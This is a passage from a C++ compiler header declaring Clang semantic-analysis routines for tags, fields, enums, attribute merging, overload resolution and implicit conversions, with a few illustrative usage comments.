RecordDecl *&AnonRecord);
Decl *ParsedFreeStandingDeclSpec(Scope *S, AccessSpecifier AS, DeclSpec &DS,
MultiTemplateParamsArg TemplateParams,
bool IsExplicitInstantiation,
RecordDecl *&AnonRecord);
Decl *BuildAnonymousStructOrUnion(Scope *S, DeclSpec &DS,
AccessSpecifier AS,
RecordDecl *Record,
const PrintingPolicy &Policy);
Decl *BuildMicrosoftCAnonymousStruct(Scope *S, DeclSpec &DS,
RecordDecl *Record);
/// Common ways to introduce type names without a tag for use in diagnostics.
/// Keep in sync with err_tag_reference_non_tag.
enum NonTagKind {
NTK_NonStruct,
NTK_NonClass,
NTK_NonUnion,
NTK_NonEnum,
NTK_Typedef,
NTK_TypeAlias,
NTK_Template,
NTK_TypeAliasTemplate,
NTK_TemplateTemplateArgument,
};
/// Given a non-tag type declaration, returns an enum useful for indicating
/// what kind of non-tag type this is.
NonTagKind getNonTagTypeDeclKind(const Decl *D, TagTypeKind TTK);
bool isAcceptableTagRedeclaration(const TagDecl *Previous,
TagTypeKind NewTag, bool isDefinition,
SourceLocation NewTagLoc,
const IdentifierInfo *Name);
enum TagUseKind {
TUK_Reference, // Reference to a tag: 'struct foo *X;'
TUK_Declaration, // Fwd decl of a tag: 'struct foo;'
TUK_Definition, // Definition of a tag: 'struct foo { int X; } Y;'
TUK_Friend // Friend declaration: 'friend struct foo;'
};
Decl *ActOnTag(Scope *S, unsigned TagSpec, TagUseKind TUK,
SourceLocation KWLoc, CXXScopeSpec &SS, IdentifierInfo *Name,
SourceLocation NameLoc, const ParsedAttributesView &Attr,
AccessSpecifier AS, SourceLocation ModulePrivateLoc,
MultiTemplateParamsArg TemplateParameterLists, bool &OwnedDecl,
bool &IsDependent, SourceLocation ScopedEnumKWLoc,
bool ScopedEnumUsesClassTag, TypeResult UnderlyingType,
bool IsTypeSpecifier, bool IsTemplateParamOrArg,
SkipBodyInfo *SkipBody = nullptr);
Decl *ActOnTemplatedFriendTag(Scope *S, SourceLocation FriendLoc,
unsigned TagSpec, SourceLocation TagLoc,
CXXScopeSpec &SS, IdentifierInfo *Name,
SourceLocation NameLoc,
const ParsedAttributesView &Attr,
MultiTemplateParamsArg TempParamLists);
TypeResult ActOnDependentTag(Scope *S,
unsigned TagSpec,
TagUseKind TUK,
const CXXScopeSpec &SS,
IdentifierInfo *Name,
SourceLocation TagLoc,
SourceLocation NameLoc);
void ActOnDefs(Scope *S, Decl *TagD, SourceLocation DeclStart,
IdentifierInfo *ClassName,
SmallVectorImpl<Decl *> &Decls);
Decl *ActOnField(Scope *S, Decl *TagD, SourceLocation DeclStart,
Declarator &D, Expr *BitfieldWidth);
FieldDecl *HandleField(Scope *S, RecordDecl *TagD, SourceLocation DeclStart,
Declarator &D, Expr *BitfieldWidth,
InClassInitStyle InitStyle,
AccessSpecifier AS);
MSPropertyDecl *HandleMSProperty(Scope *S, RecordDecl *TagD,
SourceLocation DeclStart, Declarator &D,
Expr *BitfieldWidth,
InClassInitStyle InitStyle,
AccessSpecifier AS,
const ParsedAttr &MSPropertyAttr);
FieldDecl *CheckFieldDecl(DeclarationName Name, QualType T,
TypeSourceInfo *TInfo,
RecordDecl *Record, SourceLocation Loc,
bool Mutable, Expr *BitfieldWidth,
InClassInitStyle InitStyle,
SourceLocation TSSL,
AccessSpecifier AS, NamedDecl *PrevDecl,
Declarator *D = nullptr);
bool CheckNontrivialField(FieldDecl *FD);
void DiagnoseNontrivial(const CXXRecordDecl *Record, CXXSpecialMember CSM);
enum TrivialABIHandling {
/// The triviality of a method unaffected by "trivial_abi".
TAH_IgnoreTrivialABI,
/// The triviality of a method affected by "trivial_abi".
TAH_ConsiderTrivialABI
};
bool SpecialMemberIsTrivial(CXXMethodDecl *MD, CXXSpecialMember CSM,
TrivialABIHandling TAH = TAH_IgnoreTrivialABI,
bool Diagnose = false);
/// For a defaulted function, the kind of defaulted function that it is.
class DefaultedFunctionKind {
CXXSpecialMember SpecialMember : 8;
DefaultedComparisonKind Comparison : 8;
public:
DefaultedFunctionKind()
: SpecialMember(CXXInvalid), Comparison(DefaultedComparisonKind::None) {
}
DefaultedFunctionKind(CXXSpecialMember CSM)
: SpecialMember(CSM), Comparison(DefaultedComparisonKind::None) {}
DefaultedFunctionKind(DefaultedComparisonKind Comp)
: SpecialMember(CXXInvalid), Comparison(Comp) {}
bool isSpecialMember() const { return SpecialMember != CXXInvalid; }
bool isComparison() const {
return Comparison != DefaultedComparisonKind::None;
}
explicit operator bool() const {
return isSpecialMember() || isComparison();
}
CXXSpecialMember asSpecialMember() const { return SpecialMember; }
DefaultedComparisonKind asComparison() const { return Comparison; }
/// Get the index of this function kind for use in diagnostics.
unsigned getDiagnosticIndex() const {
static_assert(CXXInvalid > CXXDestructor,
"invalid should have highest index");
static_assert((unsigned)DefaultedComparisonKind::None == 0,
"none should be equal to zero");
return SpecialMember + (unsigned)Comparison;
}
};
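// Illustrative note on getDiagnosticIndex(): for a defaulted special member,
// Comparison is None (== 0), so the index is simply the CXXSpecialMember
// value; for a defaulted comparison, SpecialMember is CXXInvalid (the highest
// special-member value), so comparison indices land above all special-member
// indices. For example:
//   DefaultedFunctionKind K(CXXCopyConstructor);
//   unsigned Idx = K.getDiagnosticIndex(); // == (unsigned)CXXCopyConstructor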
DefaultedFunctionKind getDefaultedFunctionKind(const FunctionDecl *FD);
CXXSpecialMember getSpecialMember(const CXXMethodDecl *MD) {
return getDefaultedFunctionKind(MD).asSpecialMember();
}
DefaultedComparisonKind getDefaultedComparisonKind(const FunctionDecl *FD) {
return getDefaultedFunctionKind(FD).asComparison();
}
void ActOnLastBitfield(SourceLocation DeclStart,
SmallVectorImpl<Decl *> &AllIvarDecls);
Decl *ActOnIvar(Scope *S, SourceLocation DeclStart,
Declarator &D, Expr *BitfieldWidth,
tok::ObjCKeywordKind visibility);
// This is used for both record definitions and ObjC interface declarations.
void ActOnFields(Scope *S, SourceLocation RecLoc, Decl *TagDecl,
ArrayRef<Decl *> Fields, SourceLocation LBrac,
SourceLocation RBrac, const ParsedAttributesView &AttrList);
/// ActOnTagStartDefinition - Invoked when we have entered the
/// scope of a tag's definition (e.g., for an enumeration, class,
/// struct, or union).
void ActOnTagStartDefinition(Scope *S, Decl *TagDecl);
/// Perform ODR-like check for C/ObjC when merging tag types from modules.
/// Unlike C++, this actually parses the body and rejects (errors out)
/// in case of a structural mismatch.
bool ActOnDuplicateDefinition(DeclSpec &DS, Decl *Prev,
SkipBodyInfo &SkipBody);
typedef void *SkippedDefinitionContext;
/// Invoked when we enter a tag definition that we're skipping.
SkippedDefinitionContext ActOnTagStartSkippedDefinition(Scope *S, Decl *TD);
Decl *ActOnObjCContainerStartDefinition(Decl *IDecl);
/// ActOnStartCXXMemberDeclarations - Invoked when we have parsed a
/// C++ record definition's base-specifiers clause and are starting its
/// member declarations.
void ActOnStartCXXMemberDeclarations(Scope *S, Decl *TagDecl,
SourceLocation FinalLoc,
bool IsFinalSpelledSealed,
SourceLocation LBraceLoc);
/// ActOnTagFinishDefinition - Invoked once we have finished parsing
/// the definition of a tag (enumeration, class, struct, or union).
void ActOnTagFinishDefinition(Scope *S, Decl *TagDecl,
SourceRange BraceRange);
void ActOnTagFinishSkippedDefinition(SkippedDefinitionContext Context);
void ActOnObjCContainerFinishDefinition();
/// Invoked when we must temporarily exit the objective-c container
/// scope for parsing/looking-up C constructs.
///
/// Must be followed by a call to \see ActOnObjCReenterContainerContext
void ActOnObjCTemporaryExitContainerContext(DeclContext *DC);
void ActOnObjCReenterContainerContext(DeclContext *DC);
/// ActOnTagDefinitionError - Invoked when there was an unrecoverable
/// error parsing the definition of a tag.
void ActOnTagDefinitionError(Scope *S, Decl *TagDecl);
EnumConstantDecl *CheckEnumConstant(EnumDecl *Enum,
EnumConstantDecl *LastEnumConst,
SourceLocation IdLoc,
IdentifierInfo *Id,
Expr *val);
bool CheckEnumUnderlyingType(TypeSourceInfo *TI);
bool CheckEnumRedeclaration(SourceLocation EnumLoc, bool IsScoped,
QualType EnumUnderlyingTy, bool IsFixed,
const EnumDecl *Prev);
/// Determine whether the body of an anonymous enumeration should be skipped.
/// \param II The name of the first enumerator.
SkipBodyInfo shouldSkipAnonEnumBody(Scope *S, IdentifierInfo *II,
SourceLocation IILoc);
Decl *ActOnEnumConstant(Scope *S, Decl *EnumDecl, Decl *LastEnumConstant,
SourceLocation IdLoc, IdentifierInfo *Id,
const ParsedAttributesView &Attrs,
SourceLocation EqualLoc, Expr *Val);
void ActOnEnumBody(SourceLocation EnumLoc, SourceRange BraceRange,
Decl *EnumDecl, ArrayRef<Decl *> Elements, Scope *S,
const ParsedAttributesView &Attr);
DeclContext *getContainingDC(DeclContext *DC);
/// Set the current declaration context until it gets popped.
void PushDeclContext(Scope *S, DeclContext *DC);
void PopDeclContext();
/// EnterDeclaratorContext - Used when we must lookup names in the context
/// of a declarator's nested name specifier.
void EnterDeclaratorContext(Scope *S, DeclContext *DC);
void ExitDeclaratorContext(Scope *S);
/// Push the parameters of D, which must be a function, into scope.
void ActOnReenterFunctionContext(Scope* S, Decl* D);
void ActOnExitFunctionContext();
DeclContext *getFunctionLevelDeclContext();
/// getCurFunctionDecl - If inside of a function body, this returns a pointer
/// to the function decl for the function being parsed. If we're currently
/// in a 'block', this returns the containing context.
FunctionDecl *getCurFunctionDecl();
/// getCurMethodDecl - If inside of a method body, this returns a pointer to
/// the method decl for the method being parsed. If we're currently
/// in a 'block', this returns the containing context.
ObjCMethodDecl *getCurMethodDecl();
/// getCurFunctionOrMethodDecl - Return the Decl for the current ObjC method
/// or C function we're in, otherwise return null. If we're currently
/// in a 'block', this returns the containing context.
NamedDecl *getCurFunctionOrMethodDecl();
/// Add this decl to the scope shadowed decl chains.
void PushOnScopeChains(NamedDecl *D, Scope *S, bool AddToContext = true);
/// isDeclInScope - If 'Ctx' is a function/method, isDeclInScope returns true
/// if 'D' is in Scope 'S', otherwise 'S' is ignored and isDeclInScope returns
/// true if 'D' belongs to the given declaration context.
///
/// \param AllowInlineNamespace If \c true, allow the declaration to be in the
/// enclosing namespace set of the context, rather than contained
/// directly within it.
bool isDeclInScope(NamedDecl *D, DeclContext *Ctx, Scope *S = nullptr,
bool AllowInlineNamespace = false);
/// Finds the scope corresponding to the given decl context, if it
/// happens to be an enclosing scope. Otherwise return NULL.
static Scope *getScopeForDeclContext(Scope *S, DeclContext *DC);
/// Subroutines of ActOnDeclarator().
TypedefDecl *ParseTypedefDecl(Scope *S, Declarator &D, QualType T,
TypeSourceInfo *TInfo);
bool isIncompatibleTypedef(TypeDecl *Old, TypedefNameDecl *New);
/// Describes the kind of merge to perform for availability
/// attributes (including "deprecated", "unavailable", and "availability").
enum AvailabilityMergeKind {
/// Don't merge availability attributes at all.
AMK_None,
/// Merge availability attributes for a redeclaration, which requires
/// an exact match.
AMK_Redeclaration,
/// Merge availability attributes for an override, which requires
/// an exact match or a weakening of constraints.
AMK_Override,
/// Merge availability attributes for an implementation of
/// a protocol requirement.
AMK_ProtocolImplementation,
};
/// Describes the kind of priority given to an availability attribute.
///
/// The sum of priorities determines the final priority of the attribute.
/// The final priority determines how the attribute will be merged.
/// An attribute with a lower priority will always remove higher priority
/// attributes for the specified platform when it is being applied. An
/// attribute with a higher priority will not be applied if the declaration
/// already has an availability attribute with a lower priority for the
/// specified platform. The final priority values are not expected to match
/// the values in this enumeration, but instead should be treated as a plain
/// integer value. This enumeration just names the priority weights that are
/// used to calculate that final value.
enum AvailabilityPriority : int {
/// The availability attribute was specified explicitly next to the
/// declaration.
AP_Explicit = 0,
/// The availability attribute was applied using '#pragma clang attribute'.
AP_PragmaClangAttribute = 1,
/// The availability attribute for a specific platform was inferred from
/// an availability attribute for another platform.
AP_InferredFromOtherPlatform = 2
};
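// Illustrative example of combining the weights (an assumption about how
// callers compute the final priority): an attribute inferred from another
// platform's '#pragma clang attribute'-applied attribute would carry
// AP_PragmaClangAttribute + AP_InferredFromOtherPlatform (== 3), so an
// explicitly written attribute (AP_Explicit == 0) takes precedence over it.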
/// Attribute merging methods. Return true if a new attribute was added.
AvailabilityAttr *
mergeAvailabilityAttr(NamedDecl *D, const AttributeCommonInfo &CI,
IdentifierInfo *Platform, bool Implicit,
VersionTuple Introduced, VersionTuple Deprecated,
VersionTuple Obsoleted, bool IsUnavailable,
StringRef Message, bool IsStrict, StringRef Replacement,
AvailabilityMergeKind AMK, int Priority);
TypeVisibilityAttr *
mergeTypeVisibilityAttr(Decl *D, const AttributeCommonInfo &CI,
TypeVisibilityAttr::VisibilityType Vis);
VisibilityAttr *mergeVisibilityAttr(Decl *D, const AttributeCommonInfo &CI,
VisibilityAttr::VisibilityType Vis);
UuidAttr *mergeUuidAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Uuid);
DLLImportAttr *mergeDLLImportAttr(Decl *D, const AttributeCommonInfo &CI);
DLLExportAttr *mergeDLLExportAttr(Decl *D, const AttributeCommonInfo &CI);
MSInheritanceAttr *mergeMSInheritanceAttr(Decl *D,
const AttributeCommonInfo &CI,
bool BestCase,
MSInheritanceModel Model);
FormatAttr *mergeFormatAttr(Decl *D, const AttributeCommonInfo &CI,
IdentifierInfo *Format, int FormatIdx,
int FirstArg);
SectionAttr *mergeSectionAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Name);
CodeSegAttr *mergeCodeSegAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Name);
AlwaysInlineAttr *mergeAlwaysInlineAttr(Decl *D,
const AttributeCommonInfo &CI,
const IdentifierInfo *Ident);
MinSizeAttr *mergeMinSizeAttr(Decl *D, const AttributeCommonInfo &CI);
NoSpeculativeLoadHardeningAttr *
mergeNoSpeculativeLoadHardeningAttr(Decl *D,
const NoSpeculativeLoadHardeningAttr &AL);
SpeculativeLoadHardeningAttr *
mergeSpeculativeLoadHardeningAttr(Decl *D,
const SpeculativeLoadHardeningAttr &AL);
OptimizeNoneAttr *mergeOptimizeNoneAttr(Decl *D,
const AttributeCommonInfo &CI);
SwiftNameAttr *mergeSwiftNameAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Name, bool Override);
InternalLinkageAttr *mergeInternalLinkageAttr(Decl *D, const ParsedAttr &AL);
InternalLinkageAttr *mergeInternalLinkageAttr(Decl *D,
const InternalLinkageAttr &AL);
CommonAttr *mergeCommonAttr(Decl *D, const ParsedAttr &AL);
CommonAttr *mergeCommonAttr(Decl *D, const CommonAttr &AL);
void mergeDeclAttributes(NamedDecl *New, Decl *Old,
AvailabilityMergeKind AMK = AMK_Redeclaration);
void MergeTypedefNameDecl(Scope *S, TypedefNameDecl *New,
LookupResult &OldDecls);
bool MergeFunctionDecl(FunctionDecl *New, NamedDecl *&Old, Scope *S,
bool MergeTypeWithOld);
bool MergeCompatibleFunctionDecls(FunctionDecl *New, FunctionDecl *Old,
Scope *S, bool MergeTypeWithOld);
void mergeObjCMethodDecls(ObjCMethodDecl *New, ObjCMethodDecl *Old);
void MergeVarDecl(VarDecl *New, LookupResult &Previous);
void MergeVarDeclTypes(VarDecl *New, VarDecl *Old, bool MergeTypeWithOld);
void MergeVarDeclExceptionSpecs(VarDecl *New, VarDecl *Old);
bool checkVarDeclRedefinition(VarDecl *OldDefn, VarDecl *NewDefn);
void notePreviousDefinition(const NamedDecl *Old, SourceLocation New);
bool MergeCXXFunctionDecl(FunctionDecl *New, FunctionDecl *Old, Scope *S);
// AssignmentAction - This is used by all the assignment diagnostic functions
// to represent what is actually causing the operation
enum AssignmentAction {
AA_Assigning,
AA_Passing,
AA_Returning,
AA_Converting,
AA_Initializing,
AA_Sending,
AA_Casting,
AA_Passing_CFAudited
};
/// C++ Overloading.
enum OverloadKind {
/// This is a legitimate overload: the existing declarations are
/// functions or function templates with different signatures.
Ovl_Overload,
/// This is not an overload because the signature exactly matches
/// an existing declaration.
Ovl_Match,
/// This is not an overload because the lookup results contain a
/// non-function.
Ovl_NonFunction
};
OverloadKind CheckOverload(Scope *S,
FunctionDecl *New,
const LookupResult &OldDecls,
NamedDecl *&OldDecl,
bool IsForUsingDecl);
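// Illustrative sketch (hypothetical call site):
//   NamedDecl *OldDecl = nullptr;
//   switch (CheckOverload(S, NewFD, Previous, OldDecl,
//                         /*IsForUsingDecl=*/false)) {
//   case Ovl_Overload:    /* NewFD overloads the previous decls */ break;
//   case Ovl_Match:       /* NewFD redeclares OldDecl */ break;
//   case Ovl_NonFunction: /* OldDecl is a conflicting non-function */ break;
//   }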
bool IsOverload(FunctionDecl *New, FunctionDecl *Old, bool IsForUsingDecl,
bool ConsiderCudaAttrs = true,
bool ConsiderRequiresClauses = true);
enum class AllowedExplicit {
/// Allow no explicit functions to be used.
None,
/// Allow explicit conversion functions but not explicit constructors.
Conversions,
/// Allow both explicit conversion functions and explicit constructors.
All
};
ImplicitConversionSequence
TryImplicitConversion(Expr *From, QualType ToType,
bool SuppressUserConversions,
AllowedExplicit AllowExplicit,
bool InOverloadResolution,
bool CStyle,
bool AllowObjCWritebackConversion);
bool IsIntegralPromotion(Expr *From, QualType FromType, QualType ToType);
bool IsFloatingPointPromotion(QualType FromType, QualType ToType);
bool IsComplexPromotion(QualType FromType, QualType ToType);
bool IsPointerConversion(Expr *From, QualType FromType, QualType ToType,
bool InOverloadResolution,
QualType& ConvertedType, bool &IncompatibleObjC);
bool isObjCPointerConversion(QualType FromType, QualType ToType,
QualType& ConvertedType, bool &IncompatibleObjC);
bool isObjCWritebackConversion(QualType FromType, QualType ToType,
QualType &ConvertedType);
bool IsBlockPointerConversion(QualType FromType, QualType ToType,
QualType& ConvertedType);
bool FunctionParamTypesAreEqual(const FunctionProtoType *OldType,
const FunctionProtoType *NewType,
unsigned *ArgPos = nullptr);
void HandleFunctionTypeMismatch(PartialDiagnostic &PDiag,
QualType FromType, QualType ToType);
void maybeExtendBlockObject(ExprResult &E);
CastKind PrepareCastToObjCObjectPointer(ExprResult &E);
bool CheckPointerConversion(Expr *From, QualType ToType,
CastKind &Kind,
CXXCastPath& BasePath,
bool IgnoreBaseAccess,
bool Diagnose = true);
bool IsMemberPointerConversion(Expr *From, QualType FromType, QualType ToType,
bool InOverloadResolution,
QualType &ConvertedType);
bool CheckMemberPointerConversion(Expr *From, QualType ToType,
CastKind &Kind,
CXXCastPath &BasePath,
bool IgnoreBaseAccess);
bool IsQualificationConversion(QualType FromType, QualType ToType,
bool CStyle, bool &ObjCLifetimeConversion);
bool IsFunctionConversion(QualType FromType, QualType ToType,
QualType &ResultTy);
bool DiagnoseMultipleUserDefinedConversion(Expr *From, QualType ToType);
bool isSameOrCompatibleFunctionType(CanQualType Param, CanQualType Arg);
ExprResult PerformMoveOrCopyInitialization(const InitializedEntity &Entity,
const VarDecl *NRVOCandidate,
QualType ResultType,
Expr *Value,
bool AllowNRVO = true);
bool CanPerformAggregateInitializationForOverloadResolution(
const InitializedEntity &Entity, InitListExpr *From);
bool CanPerformCopyInitialization(const InitializedEntity &Entity,
ExprResult Init);
ExprResult PerformCopyInitialization(const InitializedEntity &Entity,
SourceLocation EqualLoc,
ExprResult Init,
bool TopLevelOfInitList = false,
bool AllowExplicit = false);
ExprResult PerformObjectArgumentInitialization(Expr *From,
NestedNameSpecifier *Qualifier,
NamedDecl *FoundDecl,
CXXMethodDecl *Method);
/// Check that the lifetime of the initializer (and its subobjects) is
/// sufficient for initializing the entity, and perform lifetime extension
/// (when permitted) if not.
void checkInitializerLifetime(const InitializedEntity &Entity, Expr *Init);
ExprResult PerformContextuallyConvertToBool(Expr *From);
ExprResult PerformContextuallyConvertToObjCPointer(Expr *From);
/// Contexts in which a converted constant expression is required.
enum CCEKind {
CCEK_CaseValue, ///< Expression in a case label.
CCEK_Enumerator, ///< Enumerator value with fixed underlying type.
CCEK_TemplateArg, ///< Value of a non-type template parameter.
CCEK_NewExpr, ///< Constant expression in a noptr-new-declarator.
CCEK_ConstexprIf, ///< Condition in a constexpr if statement.
CCEK_ExplicitBool ///< Condition in an explicit(bool) specifier.
};
ExprResult CheckConvertedConstantExpression(Expr *From, QualType T,
llvm::APSInt &Value, CCEKind CCE);
ExprResult CheckConvertedConstantExpression(Expr *From, QualType T,
APValue &Value, CCEKind CCE);
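// Illustrative sketch (hypothetical call site): converting a case label to
// the switch condition's type as a converted constant expression.
//   llvm::APSInt Val;
//   ExprResult Converted = CheckConvertedConstantExpression(
//       CaseExpr, CondType, Val, CCEK_CaseValue);
//   if (Converted.isInvalid())
//     return StmtError();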
/// Abstract base class used to perform a contextual implicit
/// conversion from an expression to any type passing a filter.
class ContextualImplicitConverter {
public:
bool Suppress;
bool SuppressConversion;
ContextualImplicitConverter(bool Suppress = false,
bool SuppressConversion = false)
: Suppress(Suppress), SuppressConversion(SuppressConversion) {}
/// Determine whether the specified type is a valid destination type
/// for this conversion.
virtual bool match(QualType T) = 0;
/// Emits a diagnostic complaining that the expression does not have
/// integral or enumeration type.
virtual SemaDiagnosticBuilder
diagnoseNoMatch(Sema &S, SourceLocation Loc, QualType T) = 0;
/// Emits a diagnostic when the expression has incomplete class type.
virtual SemaDiagnosticBuilder
diagnoseIncomplete(Sema &S, SourceLocation Loc, QualType T) = 0;
/// Emits a diagnostic when the only matching conversion function
/// is explicit.
virtual SemaDiagnosticBuilder diagnoseExplicitConv(
Sema &S, SourceLocation Loc, QualType T, QualType ConvTy) = 0;
/// Emits a note for the explicit conversion function.
virtual SemaDiagnosticBuilder
noteExplicitConv(Sema &S, CXXConversionDecl *Conv, QualType ConvTy) = 0;
/// Emits a diagnostic when there are multiple possible conversion
/// functions.
virtual SemaDiagnosticBuilder
diagnoseAmbiguous(Sema &S, SourceLocation Loc, QualType T) = 0;
/// Emits a note for one of the candidate conversions.
virtual SemaDiagnosticBuilder
noteAmbiguous(Sema &S, CXXConversionDecl *Conv, QualType ConvTy) = 0;
/// Emits a diagnostic when we picked a conversion function
/// (for cases when we are not allowed to pick a conversion function).
virtual SemaDiagnosticBuilder diagnoseConversion(
Sema &S, SourceLocation Loc, QualType T, QualType ConvTy) = 0;
virtual ~ContextualImplicitConverter() {}
};
class ICEConvertDiagnoser : public ContextualImplicitConverter {
bool AllowScopedEnumerations;
public:
ICEConvertDiagnoser(bool AllowScopedEnumerations,
bool Suppress, bool SuppressConversion)
: ContextualImplicitConverter(Suppress, SuppressConversion),
AllowScopedEnumerations(AllowScopedEnumerations) {}
/// Match an integral or (possibly scoped) enumeration type.
bool match(QualType T) override;
SemaDiagnosticBuilder
diagnoseNoMatch(Sema &S, SourceLocation Loc, QualType T) override {
return diagnoseNotInt(S, Loc, T);
}
/// Emits a diagnostic complaining that the expression does not have
/// integral or enumeration type.
virtual SemaDiagnosticBuilder
diagnoseNotInt(Sema &S, SourceLocation Loc, QualType T) = 0;
};
/// Perform a contextual implicit conversion.
ExprResult PerformContextualImplicitConversion(
SourceLocation Loc, Expr *FromE, ContextualImplicitConverter &Converter);
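// Illustrative sketch (hypothetical diagnoser; the remaining pure-virtual
// overrides are elided): callers typically derive a small diagnoser and then
// run the conversion through it.
//   struct IntDiagnoser final : ICEConvertDiagnoser {
//     IntDiagnoser()
//         : ICEConvertDiagnoser(/*AllowScopedEnumerations=*/false,
//                               /*Suppress=*/false,
//                               /*SuppressConversion=*/false) {}
//     // ... override diagnoseNotInt, diagnoseIncomplete, and the other
//     // diagnostic hooks here ...
//   } Diagnoser;
//   ExprResult Converted =
//       PerformContextualImplicitConversion(Loc, FromE, Diagnoser);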
enum ObjCSubscriptKind {
OS_Array,
OS_Dictionary,
OS_Error
};
ObjCSubscriptKind CheckSubscriptingKind(Expr *FromE);
// Note that LK_String is intentionally after the other literals, as
// this is used for diagnostics logic.
enum ObjCLiteralKind {
LK_Array,
LK_Dictionary,
LK_Numeric,
LK_Boxed,
LK_String,
LK_Block,
LK_None
};
ObjCLiteralKind CheckLiteralKind(Expr *FromE);
ExprResult PerformObjectMemberConversion(Expr *From,
NestedNameSpecifier *Qualifier,
NamedDecl *FoundDecl,
NamedDecl *Member);
// Members have to be NamespaceDecl* or TranslationUnitDecl*.
// TODO: make this a typesafe union.
typedef llvm::SmallSetVector<DeclContext *, 16> AssociatedNamespaceSet;
typedef llvm::SmallSetVector<CXXRecordDecl *, 16> AssociatedClassSet;
using ADLCallKind = CallExpr::ADLCallKind;
void AddOverloadCandidate(FunctionDecl *Function, DeclAccessPair FoundDecl,
ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
bool AllowExplicit = true,
bool AllowExplicitConversion = false,
ADLCallKind IsADLCandidate = ADLCallKind::NotADL,
ConversionSequenceList EarlyConversions = None,
OverloadCandidateParamOrder PO = {});
void AddFunctionCandidates(const UnresolvedSetImpl &Functions,
ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
bool FirstArgumentIsBase = false);
void AddMethodCandidate(DeclAccessPair FoundDecl,
QualType ObjectType,
Expr::Classification ObjectClassification,
ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool SuppressUserConversion = false,
OverloadCandidateParamOrder PO = {});
void AddMethodCandidate(CXXMethodDecl *Method,
DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext, QualType ObjectType,
Expr::Classification ObjectClassification,
ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
ConversionSequenceList EarlyConversions = None,
OverloadCandidateParamOrder PO = {});
void AddMethodTemplateCandidate(FunctionTemplateDecl *MethodTmpl,
DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext,
TemplateArgumentListInfo *ExplicitTemplateArgs,
QualType ObjectType,
Expr::Classification ObjectClassification,
ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
OverloadCandidateParamOrder PO = {});
void AddTemplateOverloadCandidate(
FunctionTemplateDecl *FunctionTemplate, DeclAccessPair FoundDecl,
TemplateArgumentListInfo *ExplicitTemplateArgs, ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet, bool SuppressUserConversions = false,
bool PartialOverloading = false, bool AllowExplicit = true,
ADLCallKind IsADLCandidate = ADLCallKind::NotADL,
OverloadCandidateParamOrder PO = {});
bool CheckNonDependentConversions(
FunctionTemplateDecl *FunctionTemplate, ArrayRef<QualType> ParamTypes,
ArrayRef<Expr *> Args, OverloadCandidateSet &CandidateSet,
ConversionSequenceList &Conversions, bool SuppressUserConversions,
CXXRecordDecl *ActingContext = nullptr, QualType ObjectType = QualType(),
Expr::Classification ObjectClassification = {},
OverloadCandidateParamOrder PO = {});
void AddConversionCandidate(
CXXConversionDecl *Conversion, DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext, Expr *From, QualType ToType,
OverloadCandidateSet &CandidateSet, bool AllowObjCConversionOnExplicit,
bool AllowExplicit, bool AllowResultConversion = true);
void AddTemplateConversionCandidate(
FunctionTemplateDecl *FunctionTemplate, DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext, Expr *From, QualType ToType,
OverloadCandidateSet &CandidateSet, bool AllowObjCConversionOnExplicit,
bool AllowExplicit, bool AllowResultConversion = true);
void AddSurrogateCandidate(CXXConversionDecl *Conversion,
DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext,
const FunctionProtoType *Proto,
Expr *Object, ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet);
void AddNonMemberOperatorCandidates(
const UnresolvedSetImpl &Functions, ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr);
void AddMemberOperatorCandidates(OverloadedOperatorKind Op,
SourceLocation OpLoc, ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
OverloadCandidateParamOrder PO = {});
void AddBuiltinCandidate(QualType *ParamTys, ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool IsAssignmentOperator = false,
unsigned NumContextualBoolArguments = 0);
void AddBuiltinOperatorCandidates(OverloadedOperatorKind Op,
SourceLocation OpLoc, ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet);
void AddArgumentDependentLookupCandidates(DeclarationName Name,
SourceLocation Loc,
ArrayRef<Expr *> Args,
TemplateArgumentListInfo *ExplicitTemplateArgs,
OverloadCandidateSet& CandidateSet,
bool PartialOverloading = false);
// Emit as a 'note' the specific overload candidate
void NoteOverloadCandidate(
NamedDecl *Found, FunctionDecl *Fn,
OverloadCandidateRewriteKind RewriteKind = OverloadCandidateRewriteKind(),
QualType DestType = QualType(), bool TakingAddress = false);
// Emit, as a series of notes, all template and non-template overload
// candidates identified by the expression E.
void NoteAllOverloadCandidates(Expr *E, QualType DestType = QualType(),
bool TakingAddress = false);
/// Check the enable_if expressions on the given function. Returns the first
/// failing attribute, or NULL if they were all successful.
EnableIfAttr *CheckEnableIf(FunctionDecl *Function, ArrayRef<Expr *> Args,
bool MissingImplicitThis = false);
/// Find the failed Boolean condition within a given Boolean
/// constant expression, and describe it with a string.
std::pair<Expr *, std::string> findFailedBooleanCondition(Expr *Cond);
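// Illustrative sketch (hypothetical call site):
//   std::pair<Expr *, std::string> Failed = findFailedBooleanCondition(Cond);
//   // Failed.first is the failed subcondition; Failed.second is a printable
//   // description of it, suitable for embedding in a diagnostic.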
/// Emit diagnostics for the diagnose_if attributes on Function, ignoring any
/// non-ArgDependent DiagnoseIfAttrs.
///
/// Argument-dependent diagnose_if attributes should be checked each time a
/// function is used as a direct callee of a function call.
///
/// Returns true if any errors were emitted.
bool diagnoseArgDependentDiagnoseIfAttrs(const FunctionDecl *Function,
